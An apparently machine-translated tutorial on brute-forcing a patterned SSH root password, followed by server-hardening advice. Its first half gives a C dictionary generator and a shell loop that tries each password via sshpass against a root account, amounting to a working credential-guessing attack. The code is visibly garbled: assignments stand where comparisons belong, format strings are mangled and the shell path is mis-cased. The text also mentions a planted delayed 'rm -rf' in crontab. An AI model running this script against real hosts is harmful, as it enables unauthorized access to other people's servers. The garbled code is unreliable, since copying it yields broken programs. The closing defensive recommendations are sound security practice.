Try to crack a simple and regular root Password

[Introduction] some small companies make it easy to remember and use images. servers use the root password with fixed combination rules (developers/O & M personnel are lazy) and sshd: 22 is available on the Internet. For example, if we know that the combination rule of a password is ab124578, a total of 8 characters, the first two letters, the last six digits, and the first four digits are known as hostname. [Establish an environment test] install sshpass (for non-interactive ssh password verification) and generate a simple password dictionary to try brute force cracking to obtain the password of the local virtual machine. The following is a simple example of c and shell, which is less efficient. In actual use, it will be rewritten into a multi-process/multi-thread form. [Makedic. c] view sourceprint? 01 # include <stdio. h> 02 # include <string. h> 03 # include <stdlib. h> 04 05 int main (void) 06 {07 int I, j, k, l, cnt = 0; 08 char tmp [5] = ""; 09 FILE * fd = fopen ("xx.txt", "a +"); 10 11 if (fd = NULL) 12 {13 printf ("fopen error! \ N "); 14 return-1; 15} 16 17 for (I = 0; I <= 9; I ++) 18 {19 for (j = 0; j <= 9; j ++) 20 {21 if (j = I) 22 continue; 23 for (k = 0; k <= 9; k ++) 24 {25 if (k = I | k = j) 26 continue; 27 for (l = 0; l <= 9; l ++) 28 {29 if (l = I | l = j | l = k) 30 continue; 31 sprintf (tmp, "% d", I, j, k, l); 32 printf ("% d, % s \ n", ++ cnt, tmp ); 33 fwrite (tmp, strlen (tmp), 1, fd); 34 fwrite ("\ r \ n", 1, 2, fd); 35} 36} 37 38} 39} 4 0 fclose (fd); 41 42 return 0; 43} [getpwd. sh] view sourceprint? 01 #! /Bin/sh 02 # Install sshpass in advance, and pwd fixed rules & generated password dictionary 03 04 n = 0 05 for pwd in 'cat/home/xx.txt '06 do 07 echo "n = $ n, pwd = $ pwd "08 sshpass-p $ pwd ssh root@172.20.x.x 09 if [$? = 0] 10 then 11 echo "$ pwd is the pwd !!! "12 break 13 fi 14 n = $ [$ n + 1] 15 done [Recommended measures] 1. sshd only listens to the Intranet, and uses the Internet to apply for vpn access. (1) vi/etc/ssh/sshd_config; ListenAddress 172.20.x.x; service sshd restart; (2) You can also set 2 through iptables. the dedicated account of the server account is not allowed to be used and borrowed. The account is opened based on the minimum permissions required. Root can only be used by system group members. (Including database permission management, similar) 3. the root password is generated using professional tools, which is complex and irregular. For example, re (c, ol * tx242s. The development and testing machine (192.168.x.x) in an individual or LAN does not need to be so complex. 4. Regularly check system logs,/etc/passwd, history, netstat, and so on. (I did not develop professional O & M and information security, but my personal experience ..) 5. it is recommended that you back up and transfer important logs or operation records at regular intervals for unified archiving and analysis. 6. important programs and data, configuration, etc., must be local, remote, and multiple backups. some colleagues have inserted malicious programs and scripts in the system crontab. it may be that system ("rm-rf/xxxx") is called and takes effect only after the specified date. repairing data is terrible. 7. personnel turnover due to changes, make sure to check the account and change the password accordingly. wrong person. 8. an exception may occur!